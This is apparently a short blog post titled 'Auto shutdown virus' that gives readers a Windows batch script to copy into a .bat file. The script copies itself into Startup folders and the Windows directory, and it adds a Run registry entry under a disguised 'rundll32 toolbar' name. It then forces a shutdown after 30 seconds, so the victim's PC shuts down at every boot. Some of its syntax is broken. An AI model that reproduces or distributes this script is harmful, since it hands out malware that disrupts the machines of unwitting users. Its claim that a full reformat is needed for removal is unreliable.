Auto shutdown virus
Remember, after this virus is opened by user, your pc will automatically restart each time you start your pc, to remove it, you need to reformat your whole pc!
Copy the contain below and paste it into notepad. Afterward, save it to ".bat" format (remove quote").
------------------------------------------------------------------------------------------------------------------------------@echo off
copy "batvirus.bat" "%userprofile%\Start Menu\Programs\Startup\batvirus.bat"
valinf = "rundll32_%random%_toolbar"
reginf = "hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
COPY %0 %windir%WINSTART.BAT
shutdown -s -t 30copy %0 C:\Documents and Settings\All Users\Start Menu\Programs\Startup
------------------------------------------------------------------------------------------------------------------------------
No comments:
Post a Comment